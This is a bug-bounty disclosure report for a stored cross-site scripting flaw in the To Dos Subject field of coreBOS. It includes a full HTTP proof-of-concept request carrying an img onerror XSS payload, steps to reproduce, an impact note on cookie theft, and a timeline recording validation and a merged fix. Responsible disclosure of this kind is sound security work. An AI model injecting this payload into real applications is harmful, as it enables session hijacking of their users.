Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Valid

Reported on

Sep 22nd 2021


Description

Stored XSS in Subject in To Dos

Proof of Concept

// PoC Request
POST /corebos/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136503058339251009483555336795
Content-Length: 7141
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/corebos/index.php?module=cbCalendar&action=EditView&return_action=DetailView
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=609786462376996; _orangehrm=929bfb55f5e0dde7a982136b062a17de; BOXSID=4ipvdaiqhuu670rjgo3bspnd4h; 127001corebos=r2lm7d6pp76a2s5jsikfuv39k5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="__vt5rftk"

sid:3d0d662748c7e5561397afa2030143ed4c6533f8,1632324889
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="pagenumber"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="module"

cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="record"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="mode"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="action"

Save
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_module"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_action"

DetailView
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_viewname"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="createmode"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="search_url"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="subject"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigntype"

U
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtstart"

2021-09-22 03:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtstart"

PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtend"

2021-09-22 04:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtend"

PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_type"

Accounts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_type"

Contacts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="eventstatus"

Planned
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="taskpriority"

High
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="activitytype"

Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="visibility"

Private
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="location"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_type"

cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="description"

test
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followupdt"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_followupdt"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followuptype"

Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="inviteesid"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="set_reminder"

No
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remdays"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remhrs"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remmin"

10
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeat_frequency"

1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="recurringtype"

Daily
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="calendar_repeat_limit_date"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth"

date
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_date"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_daytype"

first
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_day"

1
-----------------------------136503058339251009483555336795--

Step to reproduce

Go to My Home Page > To Dos > Create To Do

At Subject input with payload "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger on notification after that but it takes a few seconds

Video PoC: PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. When the malicious To Dos is assigned to any group, the attacker will get all the user cookies in that group

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
Joe Bordes validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 1b9c86 2 months ago
Joe Bordes has been awarded the fix bounty